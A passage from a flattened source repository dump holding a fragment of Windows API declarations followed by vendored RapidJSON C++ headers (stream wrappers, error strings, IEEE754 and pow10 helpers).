__declspec(dllimport) LSTATUS __stdcall RegDeleteKeyW(HKEY hKey, LPCWSTR lpSubKey); 126 | 127 | __declspec(dllimport) HANDLE __stdcall GetStdHandle(DWORD nStdHandle); 128 | 129 | __declspec(dllimport) BOOL __stdcall WriteConsoleW(HANDLE hConsoleOutput, const void* lpBuffer, DWORD nNumberOfCharsToWrite, DWORD* lpNumberOfCharsWritten, void* lpReserved); 130 | __declspec(dllimport) BOOL __stdcall GetConsoleScreenBufferInfo(HANDLE hConsoleOutput, CONSOLE_SCREEN_BUFFER_INFO* lpConsoleScreenBufferInfo); 131 | __declspec(dllimport) BOOL __stdcall SetConsoleTextAttribute(HANDLE hConsoleOutput, WORD wAttributes); 132 | 133 | __declspec(dllimport) void __stdcall OutputDebugStringW(LPCWSTR lpOutputString); 134 | } 135 | } 136 | #endif // _WIN32 137 | -------------------------------------------------------------------------------- /Resources/Rapidjson/cursorstreamwrapper.h: -------------------------------------------------------------------------------- 1 | // Tencent is pleased to support the open source community by making RapidJSON available. 2 | // 3 | // Copyright (C) 2015 THL A29 Limited, a Tencent company, and Milo Yip. All rights reserved. 4 | // 5 | // Licensed under the MIT License (the "License"); you may not use this file except 6 | // in compliance with the License. You may obtain a copy of the License at 7 | // 8 | // http://opensource.org/licenses/MIT 9 | // 10 | // Unless required by applicable law or agreed to in writing, software distributed 11 | // under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR 12 | // CONDITIONS OF ANY KIND, either express or implied. See the License for the 13 | // specific language governing permissions and limitations under the License. 14 | 15 | #ifndef RAPIDJSON_CURSORSTREAMWRAPPER_H_ 16 | #define RAPIDJSON_CURSORSTREAMWRAPPER_H_ 17 | 18 | #include "stream.h" 19 | 20 | #if defined(__GNUC__) 21 | RAPIDJSON_DIAG_PUSH 22 | RAPIDJSON_DIAG_OFF(effc++) 23 | #endif 24 | 25 | #if defined(_MSC_VER) && _MSC_VER <= 1800 26 | RAPIDJSON_DIAG_PUSH 27 | RAPIDJSON_DIAG_OFF(4702) // unreachable code 28 | RAPIDJSON_DIAG_OFF(4512) // assignment operator could not be generated 29 | #endif 30 | 31 | RAPIDJSON_NAMESPACE_BEGIN 32 | 33 | 34 | //! Cursor stream wrapper for counting line and column number if error exists. 35 | /*! 36 | \tparam InputStream Any stream that implements Stream Concept 37 | */ 38 | template > 39 | class CursorStreamWrapper : public GenericStreamWrapper { 40 | public: 41 | typedef typename Encoding::Ch Ch; 42 | 43 | CursorStreamWrapper(InputStream& is): 44 | GenericStreamWrapper(is), line_(1), col_(0) {} 45 | 46 | // counting line and column number 47 | Ch Take() { 48 | Ch ch = this->is_.Take(); 49 | if(ch == '\n') { 50 | line_ ++; 51 | col_ = 0; 52 | } else { 53 | col_ ++; 54 | } 55 | return ch; 56 | } 57 | 58 | //! Get the error line number, if error exists. 59 | size_t GetLine() const { return line_; } 60 | //! Get the error column number, if error exists. 61 | size_t GetColumn() const { return col_; } 62 | 63 | private: 64 | size_t line_; //!< Current Line 65 | size_t col_; //!< Current Column 66 | }; 67 | 68 | #if defined(_MSC_VER) && _MSC_VER <= 1800 69 | RAPIDJSON_DIAG_POP 70 | #endif 71 | 72 | #if defined(__GNUC__) 73 | RAPIDJSON_DIAG_POP 74 | #endif 75 | 76 | RAPIDJSON_NAMESPACE_END 77 | 78 | #endif // RAPIDJSON_CURSORSTREAMWRAPPER_H_ 79 | -------------------------------------------------------------------------------- /Resources/Rapidjson/error/en.h: -------------------------------------------------------------------------------- 1 | // Tencent is pleased to support the open source community by making RapidJSON available. 2 | // 3 | // Copyright (C) 2015 THL A29 Limited, a Tencent company, and Milo Yip. All rights reserved. 4 | // 5 | // Licensed under the MIT License (the "License"); you may not use this file except 6 | // in compliance with the License. You may obtain a copy of the License at 7 | // 8 | // http://opensource.org/licenses/MIT 9 | // 10 | // Unless required by applicable law or agreed to in writing, software distributed 11 | // under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR 12 | // CONDITIONS OF ANY KIND, either express or implied. See the License for the 13 | // specific language governing permissions and limitations under the License. 14 | 15 | #ifndef RAPIDJSON_ERROR_EN_H_ 16 | #define RAPIDJSON_ERROR_EN_H_ 17 | 18 | #include "error.h" 19 | 20 | #ifdef __clang__ 21 | RAPIDJSON_DIAG_PUSH 22 | RAPIDJSON_DIAG_OFF(switch-enum) 23 | RAPIDJSON_DIAG_OFF(covered-switch-default) 24 | #endif 25 | 26 | RAPIDJSON_NAMESPACE_BEGIN 27 | 28 | //! Maps error code of parsing into error message. 29 | /*! 30 | \ingroup RAPIDJSON_ERRORS 31 | \param parseErrorCode Error code obtained in parsing. 32 | \return the error message. 33 | \note User can make a copy of this function for localization. 34 | Using switch-case is safer for future modification of error codes. 35 | */ 36 | inline const RAPIDJSON_ERROR_CHARTYPE* GetParseError_En(ParseErrorCode parseErrorCode) { 37 | switch (parseErrorCode) { 38 | case kParseErrorNone: return RAPIDJSON_ERROR_STRING("No error."); 39 | 40 | case kParseErrorDocumentEmpty: return RAPIDJSON_ERROR_STRING("The document is empty."); 41 | case kParseErrorDocumentRootNotSingular: return RAPIDJSON_ERROR_STRING("The document root must not be followed by other values."); 42 | 43 | case kParseErrorValueInvalid: return RAPIDJSON_ERROR_STRING("Invalid value."); 44 | 45 | case kParseErrorObjectMissName: return RAPIDJSON_ERROR_STRING("Missing a name for object member."); 46 | case kParseErrorObjectMissColon: return RAPIDJSON_ERROR_STRING("Missing a colon after a name of object member."); 47 | case kParseErrorObjectMissCommaOrCurlyBracket: return RAPIDJSON_ERROR_STRING("Missing a comma or '}' after an object member."); 48 | 49 | case kParseErrorArrayMissCommaOrSquareBracket: return RAPIDJSON_ERROR_STRING("Missing a comma or ']' after an array element."); 50 | 51 | case kParseErrorStringUnicodeEscapeInvalidHex: return RAPIDJSON_ERROR_STRING("Incorrect hex digit after \\u escape in string."); 52 | case kParseErrorStringUnicodeSurrogateInvalid: return RAPIDJSON_ERROR_STRING("The surrogate pair in string is invalid."); 53 | case kParseErrorStringEscapeInvalid: return RAPIDJSON_ERROR_STRING("Invalid escape character in string."); 54 | case kParseErrorStringMissQuotationMark: return RAPIDJSON_ERROR_STRING("Missing a closing quotation mark in string."); 55 | case kParseErrorStringInvalidEncoding: return RAPIDJSON_ERROR_STRING("Invalid encoding in string."); 56 | 57 | case kParseErrorNumberTooBig: return RAPIDJSON_ERROR_STRING("Number too big to be stored in double."); 58 | case kParseErrorNumberMissFraction: return RAPIDJSON_ERROR_STRING("Miss fraction part in number."); 59 | case kParseErrorNumberMissExponent: return RAPIDJSON_ERROR_STRING("Miss exponent in number."); 60 | 61 | case kParseErrorTermination: return RAPIDJSON_ERROR_STRING("Terminate parsing due to Handler error."); 62 | case kParseErrorUnspecificSyntaxError: return RAPIDJSON_ERROR_STRING("Unspecific syntax error."); 63 | 64 | default: return RAPIDJSON_ERROR_STRING("Unknown error."); 65 | } 66 | } 67 | 68 | RAPIDJSON_NAMESPACE_END 69 | 70 | #ifdef __clang__ 71 | RAPIDJSON_DIAG_POP 72 | #endif 73 | 74 | #endif // RAPIDJSON_ERROR_EN_H_ 75 | -------------------------------------------------------------------------------- /Resources/Rapidjson/filereadstream.h: -------------------------------------------------------------------------------- 1 | // Tencent is pleased to support the open source community by making RapidJSON available. 2 | // 3 | // Copyright (C) 2015 THL A29 Limited, a Tencent company, and Milo Yip. All rights reserved. 4 | // 5 | // Licensed under the MIT License (the "License"); you may not use this file except 6 | // in compliance with the License. You may obtain a copy of the License at 7 | // 8 | // http://opensource.org/licenses/MIT 9 | // 10 | // Unless required by applicable law or agreed to in writing, software distributed 11 | // under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR 12 | // CONDITIONS OF ANY KIND, either express or implied. See the License for the 13 | // specific language governing permissions and limitations under the License. 14 | 15 | #ifndef RAPIDJSON_FILEREADSTREAM_H_ 16 | #define RAPIDJSON_FILEREADSTREAM_H_ 17 | 18 | #include "stream.h" 19 | #include 20 | 21 | #ifdef __clang__ 22 | RAPIDJSON_DIAG_PUSH 23 | RAPIDJSON_DIAG_OFF(padded) 24 | RAPIDJSON_DIAG_OFF(unreachable-code) 25 | RAPIDJSON_DIAG_OFF(missing-noreturn) 26 | #endif 27 | 28 | RAPIDJSON_NAMESPACE_BEGIN 29 | 30 | //! File byte stream for input using fread(). 31 | /*! 32 | \note implements Stream concept 33 | */ 34 | class FileReadStream { 35 | public: 36 | typedef char Ch; //!< Character type (byte). 37 | 38 | //! Constructor. 39 | /*! 40 | \param fp File pointer opened for read. 41 | \param buffer user-supplied buffer. 42 | \param bufferSize size of buffer in bytes. Must >=4 bytes. 43 | */ 44 | FileReadStream(std::FILE* fp, char* buffer, size_t bufferSize) : fp_(fp), buffer_(buffer), bufferSize_(bufferSize), bufferLast_(0), current_(buffer_), readCount_(0), count_(0), eof_(false) { 45 | RAPIDJSON_ASSERT(fp_ != 0); 46 | RAPIDJSON_ASSERT(bufferSize >= 4); 47 | Read(); 48 | } 49 | 50 | Ch Peek() const { return *current_; } 51 | Ch Take() { Ch c = *current_; Read(); return c; } 52 | size_t Tell() const { return count_ + static_cast(current_ - buffer_); } 53 | 54 | // Not implemented 55 | void Put(Ch) { RAPIDJSON_ASSERT(false); } 56 | void Flush() { RAPIDJSON_ASSERT(false); } 57 | Ch* PutBegin() { RAPIDJSON_ASSERT(false); return 0; } 58 | size_t PutEnd(Ch*) { RAPIDJSON_ASSERT(false); return 0; } 59 | 60 | // For encoding detection only. 61 | const Ch* Peek4() const { 62 | return (current_ + 4 <= bufferLast_) ? current_ : 0; 63 | } 64 | 65 | private: 66 | void Read() { 67 | if (current_ < bufferLast_) 68 | ++current_; 69 | else if (!eof_) { 70 | count_ += readCount_; 71 | readCount_ = std::fread(buffer_, 1, bufferSize_, fp_); 72 | bufferLast_ = buffer_ + readCount_ - 1; 73 | current_ = buffer_; 74 | 75 | if (readCount_ < bufferSize_) { 76 | buffer_[readCount_] = '\0'; 77 | ++bufferLast_; 78 | eof_ = true; 79 | } 80 | } 81 | } 82 | 83 | std::FILE* fp_; 84 | Ch *buffer_; 85 | size_t bufferSize_; 86 | Ch *bufferLast_; 87 | Ch *current_; 88 | size_t readCount_; 89 | size_t count_; //!< Number of characters read 90 | bool eof_; 91 | }; 92 | 93 | RAPIDJSON_NAMESPACE_END 94 | 95 | #ifdef __clang__ 96 | RAPIDJSON_DIAG_POP 97 | #endif 98 | 99 | #endif // RAPIDJSON_FILESTREAM_H_ 100 | -------------------------------------------------------------------------------- /Resources/Rapidjson/filewritestream.h: -------------------------------------------------------------------------------- 1 | // Tencent is pleased to support the open source community by making RapidJSON available. 2 | // 3 | // Copyright (C) 2015 THL A29 Limited, a Tencent company, and Milo Yip. All rights reserved. 4 | // 5 | // Licensed under the MIT License (the "License"); you may not use this file except 6 | // in compliance with the License. You may obtain a copy of the License at 7 | // 8 | // http://opensource.org/licenses/MIT 9 | // 10 | // Unless required by applicable law or agreed to in writing, software distributed 11 | // under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR 12 | // CONDITIONS OF ANY KIND, either express or implied. See the License for the 13 | // specific language governing permissions and limitations under the License. 14 | 15 | #ifndef RAPIDJSON_FILEWRITESTREAM_H_ 16 | #define RAPIDJSON_FILEWRITESTREAM_H_ 17 | 18 | #include "stream.h" 19 | #include 20 | 21 | #ifdef __clang__ 22 | RAPIDJSON_DIAG_PUSH 23 | RAPIDJSON_DIAG_OFF(unreachable-code) 24 | #endif 25 | 26 | RAPIDJSON_NAMESPACE_BEGIN 27 | 28 | //! Wrapper of C file stream for input using fread(). 29 | /*! 30 | \note implements Stream concept 31 | */ 32 | class FileWriteStream { 33 | public: 34 | typedef char Ch; //!< Character type. Only support char. 35 | 36 | FileWriteStream(std::FILE* fp, char* buffer, size_t bufferSize) : fp_(fp), buffer_(buffer), bufferEnd_(buffer + bufferSize), current_(buffer_) { 37 | RAPIDJSON_ASSERT(fp_ != 0); 38 | } 39 | 40 | void Put(char c) { 41 | if (current_ >= bufferEnd_) 42 | Flush(); 43 | 44 | *current_++ = c; 45 | } 46 | 47 | void PutN(char c, size_t n) { 48 | size_t avail = static_cast(bufferEnd_ - current_); 49 | while (n > avail) { 50 | std::memset(current_, c, avail); 51 | current_ += avail; 52 | Flush(); 53 | n -= avail; 54 | avail = static_cast(bufferEnd_ - current_); 55 | } 56 | 57 | if (n > 0) { 58 | std::memset(current_, c, n); 59 | current_ += n; 60 | } 61 | } 62 | 63 | void Flush() { 64 | if (current_ != buffer_) { 65 | size_t result = std::fwrite(buffer_, 1, static_cast(current_ - buffer_), fp_); 66 | if (result < static_cast(current_ - buffer_)) { 67 | // failure deliberately ignored at this time 68 | // added to avoid warn_unused_result build errors 69 | } 70 | current_ = buffer_; 71 | } 72 | } 73 | 74 | // Not implemented 75 | char Peek() const { RAPIDJSON_ASSERT(false); return 0; } 76 | char Take() { RAPIDJSON_ASSERT(false); return 0; } 77 | size_t Tell() const { RAPIDJSON_ASSERT(false); return 0; } 78 | char* PutBegin() { RAPIDJSON_ASSERT(false); return 0; } 79 | size_t PutEnd(char*) { RAPIDJSON_ASSERT(false); return 0; } 80 | 81 | private: 82 | // Prohibit copy constructor & assignment operator. 83 | FileWriteStream(const FileWriteStream&); 84 | FileWriteStream& operator=(const FileWriteStream&); 85 | 86 | std::FILE* fp_; 87 | char *buffer_; 88 | char *bufferEnd_; 89 | char *current_; 90 | }; 91 | 92 | //! Implement specialized version of PutN() with memset() for better performance. 93 | template<> 94 | inline void PutN(FileWriteStream& stream, char c, size_t n) { 95 | stream.PutN(c, n); 96 | } 97 | 98 | RAPIDJSON_NAMESPACE_END 99 | 100 | #ifdef __clang__ 101 | RAPIDJSON_DIAG_POP 102 | #endif 103 | 104 | #endif // RAPIDJSON_FILESTREAM_H_ 105 | -------------------------------------------------------------------------------- /Resources/Rapidjson/fwd.h: -------------------------------------------------------------------------------- 1 | // Tencent is pleased to support the open source community by making RapidJSON available. 2 | // 3 | // Copyright (C) 2015 THL A29 Limited, a Tencent company, and Milo Yip. All rights reserved. 4 | // 5 | // Licensed under the MIT License (the "License"); you may not use this file except 6 | // in compliance with the License. You may obtain a copy of the License at 7 | // 8 | // http://opensource.org/licenses/MIT 9 | // 10 | // Unless required by applicable law or agreed to in writing, software distributed 11 | // under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR 12 | // CONDITIONS OF ANY KIND, either express or implied. See the License for the 13 | // specific language governing permissions and limitations under the License. 14 | 15 | #ifndef RAPIDJSON_FWD_H_ 16 | #define RAPIDJSON_FWD_H_ 17 | 18 | #include "rapidjson.h" 19 | 20 | RAPIDJSON_NAMESPACE_BEGIN 21 | 22 | // encodings.h 23 | 24 | template struct UTF8; 25 | template struct UTF16; 26 | template struct UTF16BE; 27 | template struct UTF16LE; 28 | template struct UTF32; 29 | template struct UTF32BE; 30 | template struct UTF32LE; 31 | template struct ASCII; 32 | template struct AutoUTF; 33 | 34 | template 35 | struct Transcoder; 36 | 37 | // allocators.h 38 | 39 | class CrtAllocator; 40 | 41 | template 42 | class MemoryPoolAllocator; 43 | 44 | // stream.h 45 | 46 | template 47 | struct GenericStringStream; 48 | 49 | typedef GenericStringStream > StringStream; 50 | 51 | template 52 | struct GenericInsituStringStream; 53 | 54 | typedef GenericInsituStringStream > InsituStringStream; 55 | 56 | // stringbuffer.h 57 | 58 | template 59 | class GenericStringBuffer; 60 | 61 | typedef GenericStringBuffer, CrtAllocator> StringBuffer; 62 | 63 | // filereadstream.h 64 | 65 | class FileReadStream; 66 | 67 | // filewritestream.h 68 | 69 | class FileWriteStream; 70 | 71 | // memorybuffer.h 72 | 73 | template 74 | struct GenericMemoryBuffer; 75 | 76 | typedef GenericMemoryBuffer MemoryBuffer; 77 | 78 | // memorystream.h 79 | 80 | struct MemoryStream; 81 | 82 | // reader.h 83 | 84 | template 85 | struct BaseReaderHandler; 86 | 87 | template 88 | class GenericReader; 89 | 90 | typedef GenericReader, UTF8, CrtAllocator> Reader; 91 | 92 | // writer.h 93 | 94 | template 95 | class Writer; 96 | 97 | // prettywriter.h 98 | 99 | template 100 | class PrettyWriter; 101 | 102 | // document.h 103 | 104 | template 105 | struct GenericMember; 106 | 107 | template 108 | class GenericMemberIterator; 109 | 110 | template 111 | struct GenericStringRef; 112 | 113 | template 114 | class GenericValue; 115 | 116 | typedef GenericValue, MemoryPoolAllocator > Value; 117 | 118 | template 119 | class GenericDocument; 120 | 121 | typedef GenericDocument, MemoryPoolAllocator, CrtAllocator> Document; 122 | 123 | // pointer.h 124 | 125 | template 126 | class GenericPointer; 127 | 128 | typedef GenericPointer Pointer; 129 | 130 | // schema.h 131 | 132 | template 133 | class IGenericRemoteSchemaDocumentProvider; 134 | 135 | template 136 | class GenericSchemaDocument; 137 | 138 | typedef GenericSchemaDocument SchemaDocument; 139 | typedef IGenericRemoteSchemaDocumentProvider IRemoteSchemaDocumentProvider; 140 | 141 | template < 142 | typename SchemaDocumentType, 143 | typename OutputHandler, 144 | typename StateAllocator> 145 | class GenericSchemaValidator; 146 | 147 | typedef GenericSchemaValidator, void>, CrtAllocator> SchemaValidator; 148 | 149 | RAPIDJSON_NAMESPACE_END 150 | 151 | #endif // RAPIDJSON_RAPIDJSONFWD_H_ 152 | -------------------------------------------------------------------------------- /Resources/Rapidjson/internal/ieee754.h: -------------------------------------------------------------------------------- 1 | // Tencent is pleased to support the open source community by making RapidJSON available. 2 | // 3 | // Copyright (C) 2015 THL A29 Limited, a Tencent company, and Milo Yip. All rights reserved. 4 | // 5 | // Licensed under the MIT License (the "License"); you may not use this file except 6 | // in compliance with the License. You may obtain a copy of the License at 7 | // 8 | // http://opensource.org/licenses/MIT 9 | // 10 | // Unless required by applicable law or agreed to in writing, software distributed 11 | // under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR 12 | // CONDITIONS OF ANY KIND, either express or implied. See the License for the 13 | // specific language governing permissions and limitations under the License. 14 | 15 | #ifndef RAPIDJSON_IEEE754_ 16 | #define RAPIDJSON_IEEE754_ 17 | 18 | #include "../rapidjson.h" 19 | 20 | RAPIDJSON_NAMESPACE_BEGIN 21 | namespace internal { 22 | 23 | class Double { 24 | public: 25 | Double() {} 26 | Double(double d) : d_(d) {} 27 | Double(uint64_t u) : u_(u) {} 28 | 29 | double Value() const { return d_; } 30 | uint64_t Uint64Value() const { return u_; } 31 | 32 | double NextPositiveDouble() const { 33 | RAPIDJSON_ASSERT(!Sign()); 34 | return Double(u_ + 1).Value(); 35 | } 36 | 37 | bool Sign() const { return (u_ & kSignMask) != 0; } 38 | uint64_t Significand() const { return u_ & kSignificandMask; } 39 | int Exponent() const { return static_cast(((u_ & kExponentMask) >> kSignificandSize) - kExponentBias); } 40 | 41 | bool IsNan() const { return (u_ & kExponentMask) == kExponentMask && Significand() != 0; } 42 | bool IsInf() const { return (u_ & kExponentMask) == kExponentMask && Significand() == 0; } 43 | bool IsNanOrInf() const { return (u_ & kExponentMask) == kExponentMask; } 44 | bool IsNormal() const { return (u_ & kExponentMask) != 0 || Significand() == 0; } 45 | bool IsZero() const { return (u_ & (kExponentMask | kSignificandMask)) == 0; } 46 | 47 | uint64_t IntegerSignificand() const { return IsNormal() ? Significand() | kHiddenBit : Significand(); } 48 | int IntegerExponent() const { return (IsNormal() ? Exponent() : kDenormalExponent) - kSignificandSize; } 49 | uint64_t ToBias() const { return (u_ & kSignMask) ? ~u_ + 1 : u_ | kSignMask; } 50 | 51 | static int EffectiveSignificandSize(int order) { 52 | if (order >= -1021) 53 | return 53; 54 | else if (order <= -1074) 55 | return 0; 56 | else 57 | return order + 1074; 58 | } 59 | 60 | private: 61 | static const int kSignificandSize = 52; 62 | static const int kExponentBias = 0x3FF; 63 | static const int kDenormalExponent = 1 - kExponentBias; 64 | static const uint64_t kSignMask = RAPIDJSON_UINT64_C2(0x80000000, 0x00000000); 65 | static const uint64_t kExponentMask = RAPIDJSON_UINT64_C2(0x7FF00000, 0x00000000); 66 | static const uint64_t kSignificandMask = RAPIDJSON_UINT64_C2(0x000FFFFF, 0xFFFFFFFF); 67 | static const uint64_t kHiddenBit = RAPIDJSON_UINT64_C2(0x00100000, 0x00000000); 68 | 69 | union { 70 | double d_; 71 | uint64_t u_; 72 | }; 73 | }; 74 | 75 | } // namespace internal 76 | RAPIDJSON_NAMESPACE_END 77 | 78 | #endif // RAPIDJSON_IEEE754_ 79 | -------------------------------------------------------------------------------- /Resources/Rapidjson/internal/pow10.h: -------------------------------------------------------------------------------- 1 | // Tencent is pleased to support the open source community by making RapidJSON available. 2 | // 3 | // Copyright (C) 2015 THL A29 Limited, a Tencent company, and Milo Yip. All rights reserved. 4 | // 5 | // Licensed under the MIT License (the "License"); you may not use this file except 6 | // in compliance with the License. You may obtain a copy of the License at 7 | // 8 | // http://opensource.org/licenses/MIT 9 | // 10 | // Unless required by applicable law or agreed to in writing, software distributed 11 | // under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR 12 | // CONDITIONS OF ANY KIND, either express or implied. See the License for the 13 | // specific language governing permissions and limitations under the License. 14 | 15 | #ifndef RAPIDJSON_POW10_ 16 | #define RAPIDJSON_POW10_ 17 | 18 | #include "../rapidjson.h" 19 | 20 | RAPIDJSON_NAMESPACE_BEGIN 21 | namespace internal { 22 | 23 | //! Computes integer powers of 10 in double (10.0^n). 24 | /*! This function uses lookup table for fast and accurate results. 25 | \param n non-negative exponent. Must <= 308. 26 | \return 10.0^n 27 | */ 28 | inline double Pow10(int n) { 29 | static const double e[] = { // 1e-0...1e308: 309 * 8 bytes = 2472 bytes 30 | 1e+0, 31 | 1e+1, 1e+2, 1e+3, 1e+4, 1e+5, 1e+6, 1e+7, 1e+8, 1e+9, 1e+10, 1e+11, 1e+12, 1e+13, 1e+14, 1e+15, 1e+16, 1e+17, 1e+18, 1e+19, 1e+20, 32 | 1e+21, 1e+22, 1e+23, 1e+24, 1e+25, 1e+26, 1e+27, 1e+28, 1e+29, 1e+30, 1e+31, 1e+32, 1e+33, 1e+34, 1e+35, 1e+36, 1e+37, 1e+38, 1e+39, 1e+40, 33 | 1e+41, 1e+42, 1e+43, 1e+44, 1e+45, 1e+46, 1e+47, 1e+48, 1e+49, 1e+50, 1e+51, 1e+52, 1e+53, 1e+54, 1e+55, 1e+56, 1e+57, 1e+58, 1e+59, 1e+60, 34 | 1e+61, 1e+62, 1e+63, 1e+64, 1e+65, 1e+66, 1e+67, 1e+68, 1e+69, 1e+70, 1e+71, 1e+72, 1e+73, 1e+74, 1e+75, 1e+76, 1e+77, 1e+78, 1e+79, 1e+80, 35 | 1e+81, 1e+82, 1e+83, 1e+84, 1e+85, 1e+86, 1e+87, 1e+88, 1e+89, 1e+90, 1e+91, 1e+92, 1e+93, 1e+94, 1e+95, 1e+96, 1e+97, 1e+98, 1e+99, 1e+100, 36 | 1e+101,1e+102,1e+103,1e+104,1e+105,1e+106,1e+107,1e+108,1e+109,1e+110,1e+111,1e+112,1e+113,1e+114,1e+115,1e+116,1e+117,1e+118,1e+119,1e+120, 37 | 1e+121,1e+122,1e+123,1e+124,1e+125,1e+126,1e+127,1e+128,1e+129,1e+130,1e+131,1e+132,1e+133,1e+134,1e+135,1e+136,1e+137,1e+138,1e+139,1e+140, 38 | 1e+141,1e+142,1e+143,1e+144,1e+145,1e+146,1e+147,1e+148,1e+149,1e+150,1e+151,1e+152,1e+153,1e+154,1e+155,1e+156,1e+157,1e+158,1e+159,1e+160, 39 | 1e+161,1e+162,1e+163,1e+164,1e+165,1e+166,1e+167,1e+168,1e+169,1e+170,1e+171,1e+172,1e+173,1e+174,1e+175,1e+176,1e+177,1e+178,1e+179,1e+180, 40 | 1e+181,1e+182,1e+183,1e+184,1e+185,1e+186,1e+187,1e+188,1e+189,1e+190,1e+191,1e+192,1e+193,1e+194,1e+195,1e+196,1e+197,1e+198,1e+199,1e+200, 41 | 1e+201,1e+202,1e+203,1e+204,1e+205,1e+206,1e+207,1e+208,1e+209,1e+210,1e+211,1e+212,1e+213,1e+214,1e+215,1e+216,1e+217,1e+218,1e+219,1e+220, 42 | 1e+221,1e+222,1e+223,1e+224,1e+225,1e+226,1e+227,1e+228,1e+229,1e+230,1e+231,1e+232,1e+233,1e+234,1e+235,1e+236,1e+237,1e+238,1e+239,1e+240, 43 | 1e+241,1e+242,1e+243,1e+244,1e+245,1e+246,1e+247,1e+248,1e+249,1e+250,1e+251,1e+252,1e+253,1e+254,1e+255,1e+256,1e+257,1e+258,1e+259,1e+260, 44 | 1e+261,1e+262,1e+263,1e+264,1e+265,1e+266,1e+267,1e+268,1e+269,1e+270,1e+271,1e+272,1e+273,1e+274,1e+275,1e+276,1e+277,1e+278,1e+279,1e+280, 45 | 1e+281,1e+282,1e+283,1e+284,1e+285,1e+286,1e+287,1e+288,1e+289,1e+290,1e+291,1e+292,1e+293,1e+294,1e+295,1e+296,1e+297,1e+298,1e+299,1e+300, 46 | 1e+301,1e+302,1e+303,1e+304,1e+305,1e+306,1e+307,1e+308 47 | }; 48 | RAPIDJSON_ASSERT(n >= 0 && n <= 308); 49 | return e[n]; 50 | } 51 | 52 | } // namespace internal 53 | RAPIDJSON_NAMESPACE_END 54 | 55 | #endif // RAPIDJSON_POW10_ 56 | -------------------------------------------------------------------------------- /Resources/Rapidjson/internal/strfunc.h: -------------------------------------------------------------------------------- 1 | // Tencent is pleased to support the open source community by making RapidJSON available. 2 | // 3 | // Copyright (C) 2015 THL A29 Limited, a Tencent company, and Milo Yip. All rights reserved. 4 | // 5 | // Licensed under the MIT License (the "License"); you may not use this file except 6 | // in compliance with the License. You may obtain a copy of the License at 7 | // 8 | // http://opensource.org/licenses/MIT 9 | // 10 | // Unless required by applicable law or agreed to in writing, software distributed 11 | // under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR 12 | // CONDITIONS OF ANY KIND, either express or implied. See the License for the 13 | // specific language governing permissions and limitations under the License. 14 | 15 | #ifndef RAPIDJSON_INTERNAL_STRFUNC_H_ 16 | #define RAPIDJSON_INTERNAL_STRFUNC_H_ 17 | 18 | #include "../stream.h" 19 | #include 20 | 21 | RAPIDJSON_NAMESPACE_BEGIN 22 | namespace internal { 23 | 24 | //! Custom strlen() which works on different character types. 25 | /*! \tparam Ch Character type (e.g. char, wchar_t, short) 26 | \param s Null-terminated input string. 27 | \return Number of characters in the string. 28 | \note This has the same semantics as strlen(), the return value is not number of Unicode codepoints. 29 | */ 30 | template 31 | inline SizeType StrLen(const Ch* s) { 32 | RAPIDJSON_ASSERT(s != 0); 33 | const Ch* p = s; 34 | while (*p) ++p; 35 | return SizeType(p - s); 36 | } 37 | 38 | template <> 39 | inline SizeType StrLen(const char* s) { 40 | return SizeType(std::strlen(s)); 41 | } 42 | 43 | template <> 44 | inline SizeType StrLen(const wchar_t* s) { 45 | return SizeType(std::wcslen(s)); 46 | } 47 | 48 | //! Returns number of code points in a encoded string. 49 | template 50 | bool CountStringCodePoint(const typename Encoding::Ch* s, SizeType length, SizeType* outCount) { 51 | RAPIDJSON_ASSERT(s != 0); 52 | RAPIDJSON_ASSERT(outCount != 0); 53 | GenericStringStream is(s); 54 | const typename Encoding::Ch* end = s + length; 55 | SizeType count = 0; 56 | while (is.src_ < end) { 57 | unsigned codepoint; 58 | if (!Encoding::Decode(is, &codepoint)) 59 | return false; 60 | count++; 61 | } 62 | *outCount = count; 63 | return true; 64 | } 65 | 66 | } // namespace internal 67 | RAPIDJSON_NAMESPACE_END 68 | 69 | #endif // RAPIDJSON_INTERNAL_STRFUNC_H_ 70 | -------------------------------------------------------------------------------- /Resources/Rapidjson/internal/swap.h: -------------------------------------------------------------------------------- 1 | // Tencent is pleased to support the open source community by making RapidJSON available. 2 | // 3 | // Copyright (C) 2015 THL A29 Limited, a Tencent company, and Milo Yip. All rights reserved. 4 | // 5 | // Licensed under the MIT License (the "License"); you may not use this file except 6 | // in compliance with the License. You may obtain a copy of the License at 7 | // 8 | // http://opensource.org/licenses/MIT 9 | // 10 | // Unless required by applicable law or agreed to in writing, software distributed 11 | // under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR 12 | // CONDITIONS OF ANY KIND, either express or implied. See the License for the 13 | // specific language governing permissions and limitations under the License. 14 | 15 | #ifndef RAPIDJSON_INTERNAL_SWAP_H_ 16 | #define RAPIDJSON_INTERNAL_SWAP_H_ 17 | 18 | #include "../rapidjson.h" 19 | 20 | #if defined(__clang__) 21 | RAPIDJSON_DIAG_PUSH 22 | RAPIDJSON_DIAG_OFF(c++98-compat) 23 | #endif 24 | 25 | RAPIDJSON_NAMESPACE_BEGIN 26 | namespace internal { 27 | 28 | //! Custom swap() to avoid dependency on C++ header 29 | /*! \tparam T Type of the arguments to swap, should be instantiated with primitive C++ types only. 30 | \note This has the same semantics as std::swap(). 31 | */ 32 | template 33 | inline void Swap(T& a, T& b) RAPIDJSON_NOEXCEPT { 34 | T tmp = a; 35 | a = b; 36 | b = tmp; 37 | } 38 | 39 | } // namespace internal 40 | RAPIDJSON_NAMESPACE_END 41 | 42 | #if defined(__clang__) 43 | RAPIDJSON_DIAG_POP 44 | #endif 45 | 46 | #endif // RAPIDJSON_INTERNAL_SWAP_H_ 47 | -------------------------------------------------------------------------------- /Resources/Rapidjson/istreamwrapper.h: -------------------------------------------------------------------------------- 1 | // Tencent is pleased to support the open source community by making RapidJSON available. 2 | // 3 | // Copyright (C) 2015 THL A29 Limited, a Tencent company, and Milo Yip. All rights reserved. 4 | // 5 | // Licensed under the MIT License (the "License"); you may not use this file except 6 | // in compliance with the License. You may obtain a copy of the License at 7 | // 8 | // http://opensource.org/licenses/MIT 9 | // 10 | // Unless required by applicable law or agreed to in writing, software distributed 11 | // under 